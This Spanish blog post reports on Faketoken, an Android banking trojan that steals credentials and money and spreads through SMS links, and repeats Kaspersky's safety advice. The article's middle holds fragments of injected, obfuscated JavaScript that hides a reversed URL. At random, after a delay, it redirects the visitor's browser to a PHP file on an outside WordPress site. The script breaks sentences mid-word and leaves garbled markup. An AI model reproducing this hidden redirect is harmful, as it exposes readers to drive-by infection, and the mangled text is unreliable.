FAKETOKEN : Este virus en Android te vacía la cuenta bancaria enviando SMS
El malware para Android no para de encontrar nuevas vías para infectarnos. Los atacantes se las ingenian para infectar nuestros móviles u obtener la mayor cantidad posible de datos para luego monetizarlos. Ahora, un nuevo troyano llamado Faketoken busca robar el dinero para enviar mensajes falsos por todo el mundo y cobrarse nuevas víctimas.
Faketoken: roba dinero y envía SMS en masa
Faketoken es un malware detectado por F-Secure por primera vez en 2012 camuflado como un generador de tokens, pero que en realidad buscaba obtener datos bancarios de los usuarios. Posteriormente, en diciembre de 2016, el malware añadió funcionalidades de ransomware.
Entre sus objetivos se encuentra mostrar pantallas de login falsas y páginas de phishing para robar credenciales y números mTAN usados por los bancos para validar transacciones, así como Google o Android Pay. El malware puede generar páginas de phishing emulando a 2.200 aplicaciones de bancos, además de robar datos como el IMEI, el IMSI o el número de teléfono.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>token.jpg” /></p>
<p> </p>
<p>Lo último que han introducido en el malware es código para hacer que los dispositivos infectados pasen a formar parte de una botnet. Así lo detectó Kaspersky Lab con su sistema de detección de botnets, donde al menos 5.000 móviles estaban siendo usados para enviar mensajes SMS con enlaces maliciosos. En esos mensajes hay enlaces para infectar nuevos dispositivos. Para enviar es<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos mensajes, el malware es capaz de robar dinero de las cuentas bancarias y añadir crédito al móvil del usuario infectado para enviar SMS en el caso de que no tenga una tarifa de contrato.
Ten cuidado con las aplicaciones que instales fuera de la Play Store
Así, el malware es capaz de mandar mensajes personalizados a un número concreto, a un grupo de números o a todos los contactos del móvil. También podía obtener todos los mensajes del dispositivo y subirlos a un servidor, resetear el móvil y dejarlo de fábrica, hacer llamadas, eliminar aplicaciones, mostrar superposiciones haciéndose pasar por webs o Google, ejecutar apps, etc. Básicamente control absoluto del móvil, donde el malware se convierte en la aplicación por defecto de los SMS.
El principal vector de infección de este malware es a través de enlaces que se envían por SMS, aunque también puede haber aplicaciones modificadas en fuentes no oficiales. Desde Kaspersky Lab no saben si se trata de una campaña única o si es el inicio de una nueva tendencia.
Para evitar verse infectado por estas apps, desde Kaspersky recomiendan instalar sólo aplicaciones que provengan de la Play Store, además de no abrir enlaces cuyo origen sea incierto, como un enlace que hayamos recibido por SMS. Incluso si el usuario que nos envía el SMS con enlace es conocido, no debemos fiarnos
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.